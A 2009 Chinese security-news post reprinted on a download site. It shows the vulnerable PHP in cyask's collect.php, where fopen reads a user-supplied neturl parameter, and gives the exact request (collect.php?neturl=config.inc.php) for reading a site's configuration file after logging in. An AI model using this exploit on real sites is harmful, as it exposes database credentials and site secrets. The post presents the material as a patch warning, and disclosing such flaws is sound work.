ARP联盟图文中心下载中心手机频道最近更新软件最近更新文章网络热点
您当前的位置→图文中心新闻资讯安全播报cyask的一个本地读文件的漏洞利用
站内搜索:

cyask的一个本地读文件的漏洞利用


2009/7/12  编辑:佚名 来源:本站整理 

昨天在晚上看到了一个这样的文章,却没有人说利用的方法,自己研究了一下,原来这么简单。
下面是这篇文章的内容。

下午帮同事看一个站,DZ的论坛,该补的都补了,咱也没圈day
然后逛了下有个仿百度知道的程序在上面,和DZ整合了,原以为也是Dz开发的,估计也没啥问题
下来看代码,看到collect.php


——————————-

PHP代码
else  
{   
/*  
检查网址  
*/  
$url=get_referer();   
$neturl=emptyempty($_POST['neturl']) ? trim($_GET['neturl']) : trim($_POST['neturl']);   
  
$collect_url=emptyempty($neturl) ? $url : $neturl;   
  
$contents = ”;   
if($fid=@fopen($collect_url,”r“))   
{   
do  
{   
$data = fread($fid, 4096);   
if (strlen($data) == 0)   
{   
break;   
}   
$contents .= $data;   
}   
while(true);   
fclose($fid);   
}   
else  
{   
show_message(’collect_url_error’, ”);   
exit;   
}  
———————————-
害人啊,本来还挺安全的一个站,整合个毛呃……

参考消息:http://www.arpun.com/找一个cyask的网站,在其上面注册,然后登录后,输入http://www.×;××.com/collect.php?neturl=config.inc.php 在内容快照里面点右键,点查看源文件,哇,什么都看到了,我只是说出来利用方法,希望大家尽早补漏洞。一切损失与本人无关哦!

更多精彩,请查看本类栏目: 新闻资讯 - 安全播报
除非注明,ARP联盟文章来于网络,投稿原创等,转载请以链接形式标明本文地址。
本文地址:http://www.arpun.com/article/4019.html

相关文章
  • ·[图文]Cydia闪退什么原因
  • ·[图文]通过Cydia怎么安装360手机卫士
  • ·[图文]Cydia源列表怎么备份?
  • ·[图文]iOS9越狱Cydia闪退的解决方法
  • ·[图文]Cydia误删了怎么办?教大家Cydia误删后恢复方法
  • ·[图文]iOS8.3越狱安装升级补丁修复Cydia Substrate依赖不兼容问题
  • ·[图文]ios8苹果越狱后cydia无法安装插件解决方法
  • ·[图文]iphone cydia插件怎么删除
  • 发表评论
    栏目列表
    阅读排行
    本类最新
    网站帮助 - 广告合作 - 下载声明 - 网站地图